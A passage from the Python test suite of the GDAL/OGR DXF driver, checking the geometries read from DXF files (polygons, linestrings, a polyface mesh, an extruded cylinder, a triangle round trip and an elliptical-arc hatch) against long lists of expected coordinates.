0.087360064895672 -0.883200674463593,3.78622460336345 0.112355328149502 -0.881246158311542,3.82664197843012 0.139811565666877 -0.87765955122504,3.86519125957839 0.169596972520106 -0.872458070875934,3.90168738921576 0.201568562497258 -0.865666687209244,3.93595516599773 0.235572854514029 -0.857318002573801,3.96783008588991 0.271446609406727 -0.847452095213172,3.99715913187718 0.30901761356937 -0.836116326868217,4.02380150852887 
0.348105505672996 -0.823365115414876,4.04762931789371 0.3885226424985 -0.809259673628662,4.06852817347981 0.430074999726512 -0.793867715329923,4.08639774937224 0.472563103360048 -0.777263130320539,4.10115226185219 0.515782987308575 -0.759525629672545,4.1127208812057 0.559527172536592 -0.740740363071464,4.12104807174486 0.603585663076254 -0.720997510051345,4.12609385840951 0.647746954122649 -0.700391847083764,4.1278340186693 0.691799047372318 -0.679022292599034,4.12626019880507 0.735530468730831 -0.656991432123733,4.12137995401128 0.778731283503886 -0.634405025814187,4.11321671212692 0.821194104198432 -0.61137150074998,4.10180966116915 0.862715086095846 -0.588001430424789,4.08721356120934 0.903094905817856 -0.564407003933257,4.06949848149492 0.942139718187561 -0.540701487402092,4.04874946407869 0.979662086792094 -0.516998680250836,4.02506611557057 1.01548188377972 -0.493412368892526,3.99856212897149 1.04942715457186 -0.470055780496802,3.96936473788492 1.08133494333891 -0.447041039437686,3.93761410572614 1.11105207527721 -0.424478629035376,3.9034626528613 1.13843589193168 -0.402476861176005,3.86707432490649 1.16335493603432 -0.381141356355458,3.8286238056993 1.1856895825708 -0.360574536643342,3.78829567872099 1.20533261304587 -0.340875134001137,3.74628354099508 1.22218973019068 -0.322137716314888,3.70278907371594 1.23618001064108 -0.304452233417734,3.65802107406893 1.247236293414 -0.287903585281599,3.61219445288998 1.25530550231681 -0.27257121445099,3.56552920297626 1.26034890074202 -0.258528724675415,3.51824934300062 1.26234227762414 -0.245843527571206,3.47058184209972 1.26127606366599 -0.234576519008966,3.42275553029828 1.2571553772766 -0.224781786780142,3.375 1.25 -0.21650635094611)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):62
# EntityHandle (String) = 204
# POLYGON Z ((2.125 -0.25 -0.649519052838329,2.875 -0.75 -1.08253175473055,3.5 0.0 -0.866025403784439,2.75 0.5 -0.43301270189222,2.125 -0.25 -0.649519052838329))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((2.125 -0.25 -0.649519052838329,2.875 -0.75 -1.08253175473055,3.5 0.0 -0.866025403784439,2.75 0.5 -0.43301270189222,2.125 -0.25 -0.649519052838329))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):63
# EntityHandle (String) = 205
# POLYGON Z ((4.875 0.25 -1.08253175473055,5.5 1.0 -0.866025403784439,4.75 1.5 -0.43301270189222,4.125 0.75 -0.649519052838329,4.875 0.25 -1.08253175473055))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((4.875 0.25 -1.08253175473055,5.5 1.0 -0.866025403784439,4.75 1.5 -0.43301270189222,4.125 0.75 -0.649519052838329,4.875 0.25 -1.08253175473055))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):64
# EntityHandle (String) = 207
# POLYGON Z ((11 2 -1.73205080756888,11.625 2.75 -1.51554445662277,12.375 2.25 -1.94855715851499,11.75 1.5 -2.1650635094611,11 2 -1.73205080756888))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((11 2 -1.73205080756888,11.625 2.75 -1.51554445662277,12.375 2.25 -1.94855715851499,11.75 1.5 -2.1650635094611,11 2 -1.73205080756888))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):65
# EntityHandle (String) = 208
# LINESTRING (2.75 0.5,2.96153846153846 0.538461538461539,3.17307692307692 0.576923076923077,3.38461538461539 0.615384615384616,3.59615384615385 0.653846153846154,3.80769230769231 0.692307692307693,4.01923076923077 0.730769230769231,4.23076923076923 0.76923076923077,4.44230769230769 0.807692307692308,4.65384615384616 0.846153846153847,4.86538461538462 0.884615384615385,5.07692307692308 0.923076923076924,5.28846153846154 0.961538461538462,5.5 1.0,5.71153846153846 1.03846153846154,5.92307692307693 1.07692307692308,6.13461538461539 1.11538461538462,6.34615384615385 1.15384615384615,6.55769230769231 1.19230769230769,6.76923076923077 1.23076923076923,6.98076923076923 1.26923076923077,7.19230769230769 1.30769230769231,7.40384615384616 1.34615384615385,7.61538461538462 1.38461538461539,7.82692307692308 1.42307692307692,8.03846153846154 1.46153846153846,8.25 1.5,8.46153846153846 1.53846153846154,8.67307692307693 1.57692307692308,8.88461538461539 1.61538461538462,9.09615384615385 1.65384615384615,9.30769230769231 1.69230769230769,9.51923076923077 1.73076923076923,9.73076923076923 1.76923076923077,9.94230769230769 1.80769230769231,10.1538461538462 1.84615384615385,10.3653846153846 1.88461538461539,10.5769230769231 1.92307692307692,10.7884615384615 1.96153846153846,11.0 2.0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2.75 0.5,2.96153846153846 0.538461538461539,3.17307692307692 0.576923076923077,3.38461538461539 0.615384615384616,3.59615384615385 0.653846153846154,3.80769230769231 0.692307692307693,4.01923076923077 0.730769230769231,4.23076923076923 0.76923076923077,4.44230769230769 0.807692307692308,4.65384615384616 0.846153846153847,4.86538461538462 0.884615384615385,5.07692307692308 0.923076923076924,5.28846153846154 0.961538461538462,5.5 1.0,5.71153846153846 1.03846153846154,5.92307692307693 1.07692307692308,6.13461538461539 1.11538461538462,6.34615384615385 1.15384615384615,6.55769230769231 1.19230769230769,6.76923076923077 1.23076923076923,6.98076923076923 1.26923076923077,7.19230769230769 1.30769230769231,7.40384615384616 1.34615384615385,7.61538461538462 1.38461538461539,7.82692307692308 1.42307692307692,8.03846153846154 1.46153846153846,8.25 1.5,8.46153846153846 1.53846153846154,8.67307692307693 1.57692307692308,8.88461538461539 1.61538461538462,9.09615384615385 1.65384615384615,9.30769230769231 1.69230769230769,9.51923076923077 1.73076923076923,9.73076923076923 1.76923076923077,9.94230769230769 1.80769230769231,10.1538461538462 1.84615384615385,10.3653846153846 1.88461538461539,10.5769230769231 1.92307692307692,10.7884615384615 1.96153846153846,11.0 2.0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):66
# EntityHandle (String) = 209
# LINESTRING (5.75 5.5,5.5082446180819 5.22760624757667,5.26788002157825 4.95546536522868,5.03029699590351 4.68383022303141,4.79688632647213 4.4129536910602,4.56903879869856 4.14308863939042,4.34814519799727 3.87448793809741,4.1355963097827 3.60740445725653,3.93278291946931 3.34209106694314,3.74109581247155 3.07880063723259,3.56192577420388 2.81778603820024,3.39666359008075 2.55930013992144,3.24670004551661 2.30359581247155,3.11342592592593 2.05092592592593,2.99823201672314 1.80154335035992,2.90250910332271 1.55570095584889,2.8276479711391 1.31365161246818,2.77503940558674 1.07564819029316,2.74607419208011 0.84194355939918,2.74214311603365 0.612790589861594,2.76457901346955 0.38843161550262,2.8133818843878 0.168866636322256,2.88721889276623 -0.046146681501713,2.98469925319038 -0.256861208044643,3.10443218024579 -0.463529813381887,3.24502688851802 -0.666405367588803,3.4050925925926 -0.865740740740744,3.58323850705508 -1.06178880291307,3.77807384649101 -1.25480242418113,3.98820782548594 -1.44503447462028,4.21224965862541 -1.63273782430588,4.44880856049496 -1.81816534331328,4.69649374568015 -2.00156990171784,4.95391442876651 -2.18320436959491,5.2196798243396 -2.36332161701985,5.49239914698496 -2.54217451406801,5.77068161128813 -2.72001593081475,6.05313643183467 -2.89709873733543,6.33837282321012 -3.0736758037054,6.625 -3.25)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (5.75 5.5,5.5082446180819 5.22760624757667,5.26788002157825 4.95546536522868,5.03029699590351 4.68383022303141,4.79688632647213 4.4129536910602,4.56903879869856 4.14308863939042,4.34814519799727 3.87448793809741,4.1355963097827 3.60740445725653,3.93278291946931 3.34209106694314,3.74109581247155 3.07880063723259,3.56192577420388 2.81778603820024,3.39666359008075 2.55930013992144,3.24670004551661 2.30359581247155,3.11342592592593 2.05092592592593,2.99823201672314 1.80154335035992,2.90250910332271 1.55570095584889,2.8276479711391 1.31365161246818,2.77503940558674 1.07564819029316,2.74607419208011 0.84194355939918,2.74214311603365 0.612790589861594,2.76457901346955 0.38843161550262,2.8133818843878 0.168866636322256,2.88721889276623 -0.046146681501713,2.98469925319038 -0.256861208044643,3.10443218024579 -0.463529813381887,3.24502688851802 -0.666405367588803,3.4050925925926 -0.865740740740744,3.58323850705508 -1.06178880291307,3.77807384649101 -1.25480242418113,3.98820782548594 -1.44503447462028,4.21224965862541 -1.63273782430588,4.44880856049496 -1.81816534331328,4.69649374568015 -2.00156990171784,4.95391442876651 -2.18320436959491,5.2196798243396 -2.36332161701985,5.49239914698496 -2.54217451406801,5.77068161128813 -2.72001593081475,6.05313643183467 -2.89709873733543,6.33837282321012 -3.0736758037054,6.625 -3.25)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):67
# EntityHandle (String) = 20A
# POINT Z (9.625 1.75 -1.51554445662277)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (9.625 1.75 -1.51554445662277)'):
feat.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test 3D entities (polyface mesh, cylinder)
def ogr_dxf_33():
    """Verify reading of 3D entities from data/3d.dxf.

    Checks that a polyface mesh (POLYLINE) is read as a 6-face
    POLYHEDRALSURFACE and that a CIRCLE with thickness is extruded
    into a cylinder.
    """
    ds = ogr.Open('data/3d.dxf')
    layer = ds.GetLayer(0)

    # Polyface mesh (POLYLINE)
    feat = layer.GetNextFeature()
    if feat.Layer != '0':
        return 'fail #1'

    geom = feat.GetGeometryRef()
    if geom.GetGeometryType() != ogr.wkbPolyhedralSurfaceZ:
        # post_reason() takes a single message string; passing the value as an
        # extra positional argument would clobber its 'frames' parameter, so
        # format the message explicitly.
        gdaltest.post_reason(
            'did not get expected geometry type; got %s instead of wkbPolyhedralSurface'
            % geom.GetGeometryType() )
        return 'fail #2'

    wkt_string = geom.ExportToIsoWkt()
    wkt_string_expected = 'POLYHEDRALSURFACE Z (((0 0 0,1 0 0,1 1 0,0 1 0,0 0 0)),((0 0 0,1 0 0,1 0 1,0 0 1,0 0 0)),((1 0 0,1 1 0,1 1 1,1 0 1,1 0 0)),((1 1 0,1 1 1,0 1 1,0 1 0,1 1 0)),((0 0 0,0 1 0,0 1 1,0 0 1,0 0 0)),((0 0 1,1 0 1,1 1 1,0 1 1,0 0 1)))'
    if wkt_string != wkt_string_expected:
        feat.DumpReadable()
        gdaltest.post_reason( 'wrong geometry for polyface mesh' )
        return 'fail'

    faces = geom.GetGeometryCount()
    if faces != 6:
        # Format the message before the call: post_reason() accepts no
        # printf-style varargs.
        gdaltest.post_reason(
            'did not get expected number of faces, got %d instead of %d'
            % (faces, 6) )
        return 'fail'

    # Cylinder (CIRCLE with thickness)
    feat = layer.GetNextFeature()
    if ogrtest.check_feature_geometry( feat, 'POLYHEDRALSURFACE Z (((2.8 -0.0 1e-31,2.79902562010393 -0.0 -0.0279025894976501,2.79610722749663 -0.0 -0.0556692403840262,2.79125904029352 -0.0 -0.0831646763271037,2.78450467837533 -0.0 -0.1102549423268,2.77587704831436 -0.0 -0.136808057330267,2.76541818305704 -0.0 -0.16269465723032,2.75317903714357 -0.0 -0.187788625114356,2.73921923846257 -0.0 -0.211967705693282,2.72360679774998 0.0 -0.235114100916989,2.70641777724759 0.0 -0.257115043874616,2.68773592013546 0.0 -0.277863348183599,2.66765224254354 0.0 -0.297257930190958,2.64626459013026 0.0 -0.315204301442689,2.6236771613883 0.0 -0.331615029022017,2.6 0.0 -0.346410161513775,2.57534845871563 0.0 -0.359517618519667,2.54984263736636 0.0 -0.370873541826715,2.52360679774998 0.0 -0.380422606518061,2.49676875823987 0.0 -0.388118290510399,2.46945927106677 0.0 -0.393923101204883,2.44181138530706 0.0 -0.397808758147309,2.413959798681 0.0 -0.399756330807638,2.386040201319 0.0 -0.399756330807638,2.35818861469294 0.0 -0.397808758147309,2.33054072893323 0.0 -0.393923101204883,2.30323124176013 0.0 -0.388118290510399,2.27639320225002 0.0 -0.380422606518061,2.25015736263363 0.0 -0.370873541826715,2.22465154128437 0.0 -0.359517618519667,2.2 0.0 -0.346410161513776,2.1763228386117 0.0 -0.331615029022017,2.15373540986974 0.0 -0.315204301442689,2.13234775745646 0.0 -0.297257930190958,2.11226407986454 0.0 -0.277863348183599,2.09358222275241 0.0 -0.257115043874616,2.07639320225002 0.0 -0.235114100916989,2.06078076153743 0.0 -0.211967705693282,2.04682096285643 0.0 -0.187788625114356,2.03458181694296 0.0 -0.16269465723032,2.02412295168564 0.0 -0.136808057330268,2.01549532162467 0.0 -0.1102549423268,2.00874095970648 0.0 -0.0831646763271037,2.00389277250337 0.0 -0.0556692403840263,2.00097437989607 0.0 -0.0279025894976502,' +
        '2.0 0.0 -4.8985871965894e-17,2.00097437989607 0.0 0.0279025894976499,2.00389277250337 0.0 0.0556692403840262,2.00874095970648 0.0 0.0831646763271036,2.01549532162467 0.0 0.1102549423268,2.02412295168564 0.0 0.136808057330267,2.03458181694296 0.0 0.16269465723032,2.04682096285643 0.0 0.187788625114356,2.06078076153743 0.0 0.211967705693282,2.07639320225002 0.0 0.235114100916989,2.09358222275241 0.0 0.257115043874616,2.11226407986454 0.0 0.277863348183599,2.13234775745646 0.0 0.297257930190958,2.15373540986974 0.0 0.315204301442689,2.1763228386117 -0.0 0.331615029022017,2.2 -0.0 0.346410161513775,2.22465154128437 -0.0 0.359517618519667,2.25015736263363 -0.0 0.370873541826715,2.27639320225002 -0.0 0.380422606518061,2.30323124176013 -0.0 0.388118290510399,2.33054072893323 -0.0 0.393923101204883,2.35818861469294 -0.0 0.397808758147309,2.386040201319 -0.0 0.399756330807638,2.413959798681 -0.0 0.399756330807638,2.44181138530706 -0.0 0.397808758147309,2.46945927106677 -0.0 0.393923101204883,2.49676875823987 -0.0 0.388118290510399,2.52360679774998 -0.0 0.380422606518061,2.54984263736636 -0.0 0.370873541826715,2.57534845871563 -0.0 0.359517618519667,2.6 -0.0 0.346410161513775,2.6236771613883 -0.0 0.331615029022017,2.64626459013026 -0.0 0.315204301442689,2.66765224254354 -0.0 0.297257930190958,2.68773592013546 -0.0 0.277863348183599,2.70641777724759 -0.0 0.257115043874616,2.72360679774998 -0.0 0.235114100916989,2.73921923846257 -0.0 0.211967705693282,2.75317903714357 -0.0 0.187788625114356,2.76541818305704 -0.0 0.16269465723032,2.77587704831436 -0.0 0.136808057330267,2.78450467837533 -0.0 0.1102549423268,2.79125904029352 -0.0 0.0831646763271039,2.79610722749663 -0.0 0.0556692403840264,2.79902562010393 -0.0 0.0279025894976499,2.8 -0.0 1e-31)),' +
        '((2.8 1.8 3.6e-16,2.79902562010393 1.8 -0.0279025894976498,2.79610722749663 1.8 -0.0556692403840258,2.79125904029352 1.8 -0.0831646763271034,2.78450467837533 1.8 -0.110254942326799,2.77587704831436 1.8 -0.136808057330267,2.76541818305704 1.8 -0.16269465723032,2.75317903714357 1.8 -0.187788625114356,2.73921923846257 1.8 -0.211967705693282,2.72360679774998 1.8 -0.235114100916989,2.70641777724759 1.8 -0.257115043874615,2.68773592013546 1.8 -0.277863348183599,2.66765224254354 1.8 -0.297257930190957,2.64626459013026 1.8 -0.315204301442689,2.6236771613883 1.8 -0.331615029022016,2.6 1.8 -0.346410161513775,2.57534845871563 1.8 -0.359517618519667,2.54984263736636 1.8 -0.370873541826715,2.52360679774998 1.8 -0.380422606518061,2.49676875823987 1.8 -0.388118290510398,2.46945927106677 1.8 -0.393923101204883,2.44181138530706 1.8 -0.397808758147309,2.413959798681 1.8 -0.399756330807638,2.386040201319 1.8 -0.399756330807638,2.35818861469294 1.8 -0.397808758147309,2.33054072893323 1.8 -0.393923101204883,2.30323124176013 1.8 -0.388118290510398,2.27639320225002 1.8 -0.380422606518061,2.25015736263363 1.8 -0.370873541826715,2.22465154128437 1.8 -0.359517618519666,2.2 1.8 -0.346410161513775,2.1763228386117 1.8 -0.331615029022016,2.15373540986974 1.8 -0.315204301442689,2.13234775745646 1.8 -0.297257930190957,2.11226407986454 1.8 -0.277863348183599,2.09358222275241 1.8 -0.257115043874615,2.07639320225002 1.8 -0.235114100916989,2.06078076153743 1.8 -0.211967705693282,2.04682096285643 1.8 -0.187788625114356,2.03458181694296 1.8 -0.16269465723032,2.02412295168564 1.8 -0.136808057330267,2.01549532162467 1.8 -0.1102549423268,2.00874095970648 1.8 -0.0831646763271034,2.00389277250337 1.8 -0.0556692403840259,2.00097437989607 1.8 -0.0279025894976499,2.0 1.8 3.11014128034106e-16,' +
        '2.00097437989607 1.8 0.0279025894976503,2.00389277250337 1.8 0.0556692403840266,2.00874095970648 1.8 0.083164676327104,2.01549532162467 1.8 0.1102549423268,2.02412295168564 1.8 0.136808057330268,2.03458181694296 1.8 0.16269465723032,2.04682096285643 1.8 0.187788625114357,2.06078076153743 1.8 0.211967705693282,2.07639320225002 1.8 0.23511410091699,2.09358222275241 1.8 0.257115043874616,2.11226407986454 1.8 0.277863348183599,2.13234775745646 1.8 0.297257930190958,2.15373540986974 1.8 0.315204301442689,2.1763228386117 1.8 0.331615029022017,2.2 1.8 0.346410161513776,2.22465154128437 1.8 0.359517618519667,2.25015736263363 1.8 0.370873541826715,2.27639320225002 1.8 0.380422606518062,2.30323124176013 1.8 0.388118290510399,2.33054072893323 1.8 0.393923101204884,2.35818861469294 1.8 0.39780875814731,2.386040201319 1.8 0.399756330807639,2.413959798681 1.8 0.399756330807639,2.44181138530706 1.8 0.39780875814731,2.46945927106677 1.8 0.393923101204884,2.49676875823987 1.8 0.388118290510399,2.52360679774998 1.8 0.380422606518062,2.54984263736636 1.8 0.370873541826715,2.57534845871563 1.8 0.359517618519667,2.6 1.8 0.346410161513776,2.6236771613883 1.8 0.331615029022017,2.64626459013026 1.8 0.315204301442689,2.66765224254354 1.8 0.297257930190958,2.68773592013546 1.8 0.277863348183599,2.70641777724759 1.8 0.257115043874616,2.72360679774998 1.8 0.23511410091699,2.73921923846257 1.8 0.211967705693283,2.75317903714357 1.8 0.187788625114357,2.76541818305704 1.8 0.16269465723032,2.77587704831436 1.8 0.136808057330268,2.78450467837533 1.8 0.1102549423268,2.79125904029352 1.8 0.0831646763271043,2.79610722749663 1.8 0.0556692403840267,2.79902562010393 1.8 0.0279025894976503,2.8 1.8 3.6e-16)),' +
        '((2.0 0.0 -4.8985871965894e-17,2.00097437989607 0.0 -0.0279025894976502,2.00389277250337 0.0 -0.0556692403840263,2.00874095970648 0.0 -0.0831646763271037,2.01549532162467 0.0 -0.1102549423268,2.02412295168564 0.0 -0.136808057330268,2.03458181694296 0.0 -0.16269465723032,2.04682096285643 0.0 -0.187788625114356,2.06078076153743 0.0 -0.211967705693282,2.07639320225002 0.0 -0.235114100916989,2.09358222275241 0.0 -0.257115043874616,2.11226407986454 0.0 -0.277863348183599,2.13234775745646 0.0 -0.297257930190958,2.15373540986974 0.0 -0.315204301442689,2.1763228386117 0.0 -0.331615029022017,2.2 0.0 -0.346410161513776,2.22465154128437 0.0 -0.359517618519667,2.25015736263363 0.0 -0.370873541826715,2.27639320225002 0.0 -0.380422606518061,2.30323124176013 0.0 -0.388118290510399,2.33054072893323 0.0 -0.393923101204883,2.35818861469294 0.0 -0.397808758147309,2.386040201319 0.0 -0.399756330807638,2.413959798681 0.0 -0.399756330807638,2.44181138530706 0.0 -0.397808758147309,2.46945927106677 0.0 -0.393923101204883,2.49676875823987 0.0 -0.388118290510399,2.52360679774998 0.0 -0.380422606518061,2.54984263736636 0.0 -0.370873541826715,2.57534845871563 0.0 -0.359517618519667,2.6 0.0 -0.346410161513775,2.6236771613883 0.0 -0.331615029022017,2.64626459013026 0.0 -0.315204301442689,2.66765224254354 0.0 -0.297257930190958,2.68773592013546 0.0 -0.277863348183599,2.70641777724759 0.0 -0.257115043874616,2.72360679774998 0.0 -0.235114100916989,2.73921923846257 -0.0 -0.211967705693282,2.75317903714357 -0.0 -0.187788625114356,2.76541818305704 -0.0 -0.16269465723032,2.77587704831436 -0.0 -0.136808057330267,2.78450467837533 -0.0 -0.1102549423268,2.79125904029352 -0.0 -0.0831646763271037,2.79610722749663 -0.0 -0.0556692403840262,2.79902562010393 -0.0 -0.0279025894976501,' +
        '2.8 -0.0 1e-31,2.8 1.8 3.6e-16,2.79902562010393 1.8 -0.0279025894976498,2.79610722749663 1.8 -0.0556692403840258,2.79125904029352 1.8 -0.0831646763271034,2.78450467837533 1.8 -0.110254942326799,2.77587704831436 1.8 -0.136808057330267,2.76541818305704 1.8 -0.16269465723032,2.75317903714357 1.8 -0.187788625114356,2.73921923846257 1.8 -0.211967705693282,2.72360679774998 1.8 -0.235114100916989,2.70641777724759 1.8 -0.257115043874615,2.68773592013546 1.8 -0.277863348183599,2.66765224254354 1.8 -0.297257930190957,2.64626459013026 1.8 -0.315204301442689,2.6236771613883 1.8 -0.331615029022016,2.6 1.8 -0.346410161513775,2.57534845871563 1.8 -0.359517618519667,2.54984263736636 1.8 -0.370873541826715,2.52360679774998 1.8 -0.380422606518061,2.49676875823987 1.8 -0.388118290510398,2.46945927106677 1.8 -0.393923101204883,2.44181138530706 1.8 -0.397808758147309,2.413959798681 1.8 -0.399756330807638,2.386040201319 1.8 -0.399756330807638,2.35818861469294 1.8 -0.397808758147309,2.33054072893323 1.8 -0.393923101204883,2.30323124176013 1.8 -0.388118290510398,2.27639320225002 1.8 -0.380422606518061,2.25015736263363 1.8 -0.370873541826715,2.22465154128437 1.8 -0.359517618519666,2.2 1.8 -0.346410161513775,2.1763228386117 1.8 -0.331615029022016,2.15373540986974 1.8 -0.315204301442689,2.13234775745646 1.8 -0.297257930190957,2.11226407986454 1.8 -0.277863348183599,2.09358222275241 1.8 -0.257115043874615,2.07639320225002 1.8 -0.235114100916989,2.06078076153743 1.8 -0.211967705693282,2.04682096285643 1.8 -0.187788625114356,2.03458181694296 1.8 -0.16269465723032,2.02412295168564 1.8 -0.136808057330267,2.01549532162467 1.8 -0.1102549423268,2.00874095970648 1.8 -0.0831646763271034,2.00389277250337 1.8 -0.0556692403840259,2.00097437989607 1.8 -0.0279025894976499,2.0 1.8 3.11014128034106e-16,2.0 0.0 -4.8985871965894e-17)),' +
        '((2.8 -0.0 1e-31,2.79902562010393 -0.0 0.0279025894976499,2.79610722749663 -0.0 0.0556692403840264,2.79125904029352 -0.0 0.0831646763271039,2.78450467837533 -0.0 0.1102549423268,2.77587704831436 -0.0 0.136808057330267,2.76541818305704 -0.0 0.16269465723032,2.75317903714357 -0.0 0.187788625114356,2.73921923846257 -0.0 0.211967705693282,2.72360679774998 -0.0 0.235114100916989,2.70641777724759 -0.0 0.257115043874616,2.68773592013546 -0.0 0.277863348183599,2.66765224254354 -0.0 0.297257930190958,2.64626459013026 -0.0 0.315204301442689,2.6236771613883 -0.0 0.331615029022017,2.6 -0.0 0.346410161513775,2.57534845871563 -0.0 0.359517618519667,2.54984263736636 -0.0 0.370873541826715,2.52360679774998 -0.0 0.380422606518061,2.49676875823987 -0.0 0.388118290510399,2.46945927106677 -0.0 0.393923101204883,2.44181138530706 -0.0 0.397808758147309,2.413959798681 -0.0 0.399756330807638,2.386040201319 -0.0 0.399756330807638,2.35818861469294 -0.0 0.397808758147309,2.33054072893323 -0.0 0.393923101204883,2.30323124176013 -0.0 0.388118290510399,2.27639320225002 -0.0 0.380422606518061,2.25015736263363 -0.0 0.370873541826715,2.22465154128437 -0.0 0.359517618519667,2.2 -0.0 0.346410161513775,2.1763228386117 -0.0 0.331615029022017,2.15373540986974 0.0 0.315204301442689,2.13234775745646 0.0 0.297257930190958,2.11226407986454 0.0 0.277863348183599,2.09358222275241 0.0 0.257115043874616,2.07639320225002 0.0 0.235114100916989,2.06078076153743 0.0 0.211967705693282,2.04682096285643 0.0 0.187788625114356,2.03458181694296 0.0 0.16269465723032,2.02412295168564 0.0 0.136808057330267,2.01549532162467 0.0 0.1102549423268,2.00874095970648 0.0 0.0831646763271036,2.00389277250337 0.0 0.0556692403840262,2.00097437989607 0.0 0.0279025894976499,' +
        '2.0 0.0 -4.8985871965894e-17,2.0 1.8 3.11014128034106e-16,2.00097437989607 1.8 0.0279025894976503,2.00389277250337 1.8 0.0556692403840266,2.00874095970648 1.8 0.083164676327104,2.01549532162467 1.8 0.1102549423268,2.02412295168564 1.8 0.136808057330268,2.03458181694296 1.8 0.16269465723032,2.04682096285643 1.8 0.187788625114357,2.06078076153743 1.8 0.211967705693282,2.07639320225002 1.8 0.23511410091699,2.09358222275241 1.8 0.257115043874616,2.11226407986454 1.8 0.277863348183599,2.13234775745646 1.8 0.297257930190958,2.15373540986974 1.8 0.315204301442689,2.1763228386117 1.8 0.331615029022017,2.2 1.8 0.346410161513776,2.22465154128437 1.8 0.359517618519667,2.25015736263363 1.8 0.370873541826715,2.27639320225002 1.8 0.380422606518062,2.30323124176013 1.8 0.388118290510399,2.33054072893323 1.8 0.393923101204884,2.35818861469294 1.8 0.39780875814731,2.386040201319 1.8 0.399756330807639,2.413959798681 1.8 0.399756330807639,2.44181138530706 1.8 0.39780875814731,2.46945927106677 1.8 0.393923101204884,2.49676875823987 1.8 0.388118290510399,2.52360679774998 1.8 0.380422606518062,2.54984263736636 1.8 0.370873541826715,2.57534845871563 1.8 0.359517618519667,2.6 1.8 0.346410161513776,2.6236771613883 1.8 0.331615029022017,2.64626459013026 1.8 0.315204301442689,2.66765224254354 1.8 0.297257930190958,2.68773592013546 1.8 0.277863348183599,2.70641777724759 1.8 0.257115043874616,2.72360679774998 1.8 0.23511410091699,2.73921923846257 1.8 0.211967705693283,2.75317903714357 1.8 0.187788625114357,2.76541818305704 1.8 0.16269465723032,2.77587704831436 1.8 0.136808057330268,2.78450467837533 1.8 0.1102549423268,2.79125904029352 1.8 0.0831646763271043,2.79610722749663 1.8 0.0556692403840267,2.79902562010393 1.8 0.0279025894976503,2.8 1.8 3.6e-16,2.8 -0.0 1e-31)))' ):
        gdaltest.post_reason( 'wrong geometry for cylinder' )
        return 'fail'

    return 'success'
###############################################################################
# Writing Triangle geometry and checking if it is written properly
def ogr_dxf_34():
    """Write a TRIANGLE geometry and verify it reads back as a POLYGON."""
    out_ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/triangle_test.dxf')
    out_lyr = out_ds.CreateLayer('entities')

    feature = ogr.Feature(feature_def=out_lyr.GetLayerDefn())
    feature.SetGeometryDirectly(ogr.CreateGeometryFromWkt('TRIANGLE ((0 0,0 1,1 0,0 0))'))
    out_lyr.CreateFeature(feature)

    # Drop all references so the datasource is closed and flushed to disk.
    feature = None
    out_lyr = None
    out_ds = None

    # Read back and inspect the first feature.
    in_ds = ogr.Open('tmp/triangle_test.dxf')
    first_feat = in_ds.GetLayer(0).GetNextFeature()
    received_wkt = first_feat.GetGeometryRef().ExportToWkt()
    expected_wkt = 'POLYGON ((0 0,0 1,1 0,0 0))'
    if received_wkt != expected_wkt:
        gdaltest.post_reason( 'did not get expected geometry back: got %s' % received_wkt )
        return 'fail'

    in_ds = None
    gdal.Unlink('tmp/triangle_test.dxf')
    return 'success'
###############################################################################
# Test reading hatch with elliptical arcs
def ogr_dxf_35():
    """Read a hatch whose boundary contains elliptical arcs and check the
    tessellated polygon that results (data/elliptical-arc-hatch-min.dxf)."""
    ds = ogr.Open('data/elliptical-arc-hatch-min.dxf')
    lyr = ds.GetLayer(0)

    feat = lyr.GetNextFeature()
    expected_wkt = "POLYGON Z ((10.0 5.0 0,10.0121275732481 0.823574944937595 0," + \
        "10.0484514617793 -3.3325901498166 0," + \
        "10.1087954573461 -7.44833360561541 0," + \
        "10.1928668294578 -11.5036898303666 0," + \
        "10.3002577454253 -15.478986172205 0," + \
        "10.4304472487686 -19.3549383521031 0," + \
        "10.5828037863926 -23.1127440124738 0," + \
        "10.7565882722693 -26.7341739279578 0," + \
        "10.950957672766 -30.2016604359299 0," + \
        "11.164969096226 -33.4983826577451 0," + \
        "11.3975843669637 -36.6083480973141 0," + \
        "11.6476750614854 -39.5164702211696 0," + \
        "11.9140279825044 -42.2086416436832 0," + \
        "12.1953510441969 -44.6718025624057 0," + \
        "12.4902795401481 -46.8940041115515 0," + \
        "12.797382763583 -48.8644663262969 0," + \
        "13.1151709477668 -50.5736304367052 0," + \
        "13.442102492907 -52.0132052375995 0," + \
        "13.7765914444993 -53.1762073094422 0," + \
        "14.1170151868394 -54.0569948951078 0," + \
        "14.4617223143788 -54.6512952682117 0," + \
        "14.8090406427424 -54.9562254602315 0," + \
        "15.1572853205429 -54.9703062458714 0," + \
        "15.5047670026452 -54.6934693188278 0," + \
        "15.8498000452284 -54.1270576231449 0," + \
        "16.1907106828936 -53.2738188385539 0," + \
        "16.5258451481492 -52.137892051398 0," + \
        "16.853577693885 -50.7247876758036 0," + \
        "17.1723184799194 -49.0413607224995 0," + \
        "17.4805212853603 -47.0957775449594 0," + \
        "17.7766910093686 -44.8974762241817 0," + \
        "18.0593909239355 -42.457120784282 0," + \
        "18.3272496434925 -39.7865494609998 0," + \
        "18.578967777543 -36.8987172740701 0," + \
        "18.8133242340436 -33.8076331820431 0," + \
        "19.0291821429573 -30.5282921244156 0," + \
        "19.2254943712436 -27.0766022807403 0," + \
        "19.4013086025311 -23.4693078995808 0," + \
        "19.5557719568327 -19.7239080716712 0," + \
        "19.6881351278911 -15.8585718413141 0," + \
        "19.7977560180852 -11.8920500678142 0," + \
        "19.8841028532649 -7.84358446451107 0," + \
        "19.9467567624029 -3.73281425666327 0," + \
        "19.9854138095503 0.420319089008591 0," + \
